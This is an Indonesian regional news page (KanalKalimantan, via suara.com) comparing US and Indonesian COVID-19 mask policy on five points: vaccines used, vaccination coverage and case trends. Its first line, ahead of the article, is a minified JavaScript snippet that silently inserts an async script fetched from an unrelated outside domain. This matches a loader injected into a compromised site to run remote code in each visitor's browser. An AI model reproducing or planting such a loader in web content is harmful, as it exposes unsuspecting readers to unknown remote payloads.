(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kesehatan

Soal Kebijakan Lepas Masker, Ini 5 Perbedaan Amerika Serikat dan Indonesia


KANALKALIMANTAN.COM – Pakar kesehatan di Indonesia menyebut kebijakan lepas masker bagi yang sudah divaksinasi di Amerika Serikat tak bisa diterapkan di Indonesia.

Guru Besar Fakultas Kedokteran Universitas Indonesia, Prof Tjandra Yoga Aditama, mengatakan bahwa setidaknya ada lima perbedaan dan alasan yang membuat kebijakan tersebut tak bisa diterapkan di Indonesia. Alasannya beragam, mulai perbedaan vaksin COVID-19 yang digunakan hingga cakupan vaksinasi.

Pengertian Vaksinasi Lengkap

Kebijakan di Amerika Serikat ini menyebutkan, bahwa mereka yang sudah divaksin secara penuh dapat beraktivitas tanpa menggunakan masker dan menjaga jarak, kecuali jika ada aturan lokal lain.

Baca Juga:
Soroti Banjir Satui, Walhi Kalsel: Kenapa Air dan Hujan Disalahkan, Kalsel Lagi ‘Sakit’!

Bila ditelaah, yang dimaksud sudah divaksinasi secara penuh adalah bila sudah 2 minggu setelah penyuntikan dosis ke 2 vaksin Pfizer atau Moderna, atau 2 minggu sesudah penyuntikan dosis tunggal vaksin Johnson & Johnson.

Di luar itu, dianggap belum divaksinasi secara penuh dan tetap harus pakai masker dan menjaga jarak.

Vaksin COVID-19 yang Digunakan

Di Indonesia sendiri masih memakai vaksin produk Sinovac dan AstraZeneca. Satu lagi yang telah mendapat izin EUA BPOM untuk adalah vaksin Sinopharm.

Vaksin Johnson & Johnson, Pfizer, dan Moderna hingga saat ini belum digunakan di Indonesia.

Baca Juga:
Bendungan Kusan Upaya Kurangi Banjir di Tanbu

Cakupan Vaksinasi

Data CDC pertanggal 15 Mei 2021 menunjukkan, sudah ada sekitar 268 juta dosis vaksin COVID-19 yang disuntikkan di Amerika Serikat.

Sebelumnya, data pada 14 Mei 2021 menunjukkan bahwa sekitar 155,3 juta orang di negara tersebut sudah menerima vaksinasi satu kali, dan sekitar 120,3 juta orang sudah divaksinasi lengkap dua kali dengan vaksin Pfizer dan Moderna, serta satu kali dosis tunggal vaksin Johnson & Johnson.

Secara data, cakupan vaksinasi di AS sudah 59 persen penduduk yang divaksin setidaknya satu kali. Presiden Joe Biden menargetkan 70 persen orang dewasa akan divaksin pada 4 Juli mendatang.

Saat ini, setiap harinya dilakukan penyuntikan 1,95 juta dosis vaksin seharinya di Amerika Serikat, bahkan sampai 3,38 juta dosis sehari pada 13 April 2021 yang lalu.

Tren Kenaikan Kasus COVID-19

Adanya pola kecenderungan epidemilogi terkait naik turunnya jumlah kasus, juga angka kematian di negara AS.

Upaya Motivasi Masyarakat

Upaya memotivasi masyarakat untuk mau divaksinasi merupakan salah satu cara untuk meningkatkan cakupan. Menurut Prof Tjandra Yoga Aditama, dalam pertemuan internasional perwakilan negara AS aktif mengajak masyarakat di sekitar lingkungan rumah sakit untuk divaksinasi.

“Jangan lupakan juga pertimbangan social determinant of health, yaitu kondisi sosial yang mempengaruhi kesempatan seseorang untuk memperoleh kesehatan,” tutupnya. (suara.com)


Al Ghifari

Recent Posts

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

2 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

3 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

3 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

4 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

5 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

7 jam ago

This website uses cookies.